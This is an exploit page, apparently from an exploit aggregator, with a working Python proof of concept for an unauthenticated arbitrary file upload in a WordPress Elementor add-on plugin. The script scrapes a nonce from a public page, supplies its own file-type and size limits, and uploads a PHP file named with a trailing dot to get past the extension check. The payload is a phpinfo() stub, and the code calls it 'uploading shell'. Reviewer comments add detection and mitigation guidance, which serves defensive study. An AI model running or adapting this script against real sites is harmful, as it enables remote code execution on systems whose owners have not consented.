## https://sploitus.com/exploit?id=WPEX-ID:C2CF5FD1-663D-4BC1-ADCD-E6064EB32ECE
To reproduce, you need a WordPress site with Elementor installed and a page or post that was edited with Elementor.
The Python script below is the proof of concept; its payload is a file containing only a `phpinfo()` call.
from io import StringIO
import requests
from urllib import parse
import json
import sys
import re
import io
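# Proof of concept for a file upload through the `wpr_addons_upload_file`
# AJAX action. The uploaded file contains only a phpinfo() call.
#
# Flow:
#   1. Fetch the Elementor page given on the command line and read the nonce
#      embedded in its `WprConfig` JavaScript object.
#   2. POST a multipart upload to /wp-admin/admin-ajax.php carrying that nonce.
#
# Reviewer notes (defensive reading of what the request shows):
#   - The nonce is scraped from a page fetched without logging in, so it is
#     not acting as an authentication control for this action.
#   - `max_file_size` and `allowed_file_types` are fields of the request body,
#     i.e. the client chooses them. NOTE(review): presumably the affected
#     handler trusts these values instead of a server-side allow-list --
#     confirm against the plugin source.
#   - The uploaded name ends in a trailing dot after `.php`. NOTE(review):
#     looks intended to slip past an extension comparison -- confirm.
#   - Detection: POSTs to admin-ajax.php with action=wpr_addons_upload_file
#     that carry no authenticated session, and newly written files whose name
#     contains `.php` in the directory the handler stores uploads in.
#   - Mitigation: update the plugin to a fixed release, enforce the extension
#     allow-list on the server after normalising the filename, and configure
#     the web server not to execute PHP from upload directories.

if len(sys.argv) != 2:
    print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
    sys.exit()

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
# The AJAX endpoint lives at the site root, not under the page path.
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
    print('# Getting nonce..')
    page = s.get(elementor_url).text

    # re.search() returns None when the page has no WprConfig nonce. The
    # original called .groups() on the result unconditionally, which raised
    # AttributeError and made the "couldn't get nonce" branch unreachable.
    nonce_match = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page)
    if nonce_match is None:
        print('Error: Couldn\'t get nonce.')
        sys.exit()
    nonce = nonce_match.group(1)

    print('# Uploading shell..')
    shell = io.BytesIO(b'<?php phpinfo();')

    # Form fields sent next to the file; note that the size limit and the
    # allowed-types list are supplied by the client.
    data = {
        'wpr_addons_nonce': nonce,
        'max_file_size': 100,
        'allowed_file_types': ',',
        'action': 'wpr_addons_upload_file',
        'triggering_event': 'click',
    }
    file = {
        'uploaded_file': ('phpinfo.php.', shell),
    }

    # The handler's response body is printed as-is.
    print(requests.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)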